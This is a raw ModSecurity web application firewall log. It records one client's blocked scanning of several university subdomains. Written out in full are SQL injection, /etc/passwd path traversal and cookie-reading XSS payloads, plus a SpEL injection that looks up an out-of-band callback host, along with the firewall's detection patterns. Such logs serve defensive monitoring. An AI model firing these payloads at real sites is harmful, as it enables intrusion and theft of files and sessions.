"OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO12J8Co-f0AAAXXhe8AAAAF"]
[Tue Aug 29 11:37:59.508197 2023] [:error] [pid 1285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:lastname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:lastname: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO12J8Co-f0AAAUFdqwAAAA9"]
[Tue Aug 29 11:37:59.528116 2023] [:error] [pid 1493] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:lastname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:lastname: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO12J8Co-f0AAAXVynsAAAAB"]
[Tue Aug 29 11:37:59.542967 2023] [:error] [pid 1495] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:logfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:logfile: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/usc-e-shop/functions/content-log.php"] [unique_id "ZO12J8Co-f0AAAXXhfIAAAAF"]
[Tue Aug 29 11:38:08.704057 2023] [:error] [pid 1519] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bf_text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:bf_text: \\x22><img src=x onerror=console.log(123);>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO12MMCo-f0AAAXviFIAAAAb"]
[Tue Aug 29 11:38:10.609911 2023] [:error] [pid 1494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/down_data.php"] [unique_id "ZO12MsCo-f0AAAXWLKQAAAAD"]
[Tue Aug 29 11:38:10.711638 2023] [:error] [pid 1506] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/down_data.php"] [unique_id "ZO12MsCo-f0AAAXi3zwAAAAP"]
[Tue Aug 29 11:38:10.752475 2023] [:error] [pid 1397] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/down_data.php"] [unique_id "ZO12MsCo-f0AAAV1EWEAAAAd"]
[Tue Aug 29 11:38:10.771318 2023] [:error] [pid 1476] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/down_data.php"] [unique_id "ZO12MsCo-f0AAAXEIC0AAAAN"]
[Tue Aug 29 11:38:10.772042 2023] [:error] [pid 1509] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:lastname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:lastname: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO12MsCo-f0AAAXlRnkAAAAV"]
[Tue Aug 29 11:38:10.785436 2023] [:error] [pid 1507] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/down_data.php"] [unique_id "ZO12MsCo-f0AAAXj8loAAAAQ"]
[Tue Aug 29 11:38:21.400922 2023] [:error] [pid 1523] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/down_data.php"] [unique_id "ZO12PcCo-f0AAAXz7AcAAAAk"]
[Tue Aug 29 11:38:21.404565 2023] [:error] [pid 1525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:logfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:logfile: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/usc-e-shop/functions/content-log.php"] [unique_id "ZO12PcCo-f0AAAX1nxYAAAAm"]
[Tue Aug 29 11:38:23.357716 2023] [:error] [pid 1521] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:path: ../../../../../../../../../../etc/./zpx/../passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/pacsone/nocache.php"] [unique_id "ZO12P8Co-f0AAAXxYNIAAAAh"]
[Tue Aug 29 11:38:23.358555 2023] [:error] [pid 1494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:path: ../../../../../../../../../../etc/./zpx/../passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/pacsone/nocache.php"] [unique_id "ZO12P8Co-f0AAAXWLMAAAAAD"]
[Tue Aug 29 11:38:23.403430 2023] [:error] [pid 1532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:path: ../../../../../../../../../../etc/./zpx/../passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/pacsone/nocache.php"] [unique_id "ZO12P8Co-f0AAAX8PQ8AAAAK"]
[Tue Aug 29 11:38:23.429086 2023] [:error] [pid 1494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:path: ../../../../../../../../../../etc/./zpx/../passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/pacsone/nocache.php"] [unique_id "ZO12P8Co-f0AAAXWLMMAAAAD"]
[Tue Aug 29 11:38:23.436485 2023] [:error] [pid 1520] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:path: ../../../../../../../../../../etc/./zpx/../passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/pacsone/nocache.php"] [unique_id "ZO12P8Co-f0AAAXwLFEAAAAe"]
[Tue Aug 29 11:38:33.371464 2023] [:error] [pid 1494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cID: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/FlagEm/flagit.php"] [unique_id "ZO12ScCo-f0AAAXWLPUAAAAD"]
[Tue Aug 29 11:38:33.372873 2023] [:error] [pid 1510] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cID: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/FlagEm/flagit.php"] [unique_id "ZO12ScCo-f0AAAXm8AAAAAAW"]
[Tue Aug 29 11:38:33.379859 2023] [:error] [pid 1524] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cID: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/FlagEm/flagit.php"] [unique_id "ZO12ScCo-f0AAAX0Km0AAAAl"]
[Tue Aug 29 11:38:33.380653 2023] [:error] [pid 1122] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cID: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/FlagEm/flagit.php"] [unique_id "ZO12ScCo-f0AAARiDxUAAAAJ"]
[Tue Aug 29 11:38:33.394535 2023] [:error] [pid 1493] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cID: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/FlagEm/flagit.php"] [unique_id "ZO12ScCo-f0AAAXVyrUAAAAB"]
[Tue Aug 29 11:38:34.433709 2023] [:error] [pid 1544] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:url: #{T(java.net.InetAddress).getByName('cjmnbitjmimt14dgn26g19i8d46w56q8n.oast.site')}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js"] [unique_id "ZO12SsCo-f0AAAYIYhMAAAAM"]
[Tue Aug 29 11:38:34.476531 2023] [:error] [pid 1493] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:view: <script>alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/help/index.jsp"] [unique_id "ZO12SsCo-f0AAAXVyrcAAAAB"]
[Tue Aug 29 11:38:34.480110 2023] [:error] [pid 1510] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:url: #{T(java.net.InetAddress).getByName('cjmnbitjmimt14dgn26ggpcdwdnrzm3qh.oast.site')}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js"] [unique_id "ZO12SsCo-f0AAAXm8AMAAAAW"]
[Tue Aug 29 11:38:34.480651 2023] [:error] [pid 1524] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:view: <script>alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/help/index.jsp"] [unique_id "ZO12SsCo-f0AAAX0Km8AAAAl"]
[Tue Aug 29 11:38:34.525556 2023] [:error] [pid 1524] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:view: <script>alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/help/index.jsp"] [unique_id "ZO12SsCo-f0AAAX0KnEAAAAl"]
[Tue Aug 29 11:38:34.528622 2023] [:error] [pid 1528] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:view: <script>alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/help/index.jsp"] [unique_id "ZO12SsCo-f0AAAX4pmAAAAAF"]
[Tue Aug 29 11:38:34.529694 2023] [:error] [pid 1397] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:view: <script>alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/help/index.jsp"] [unique_id "ZO12SsCo-f0AAAV1EbQAAAAd"]
[Tue Aug 29 11:38:34.530587 2023] [:error] [pid 1122] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:path: ../../../../../../../../../../etc/./zpx/../passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/pacsone/nocache.php"] [unique_id "ZO12SsCo-f0AAARiDxkAAAAJ"]
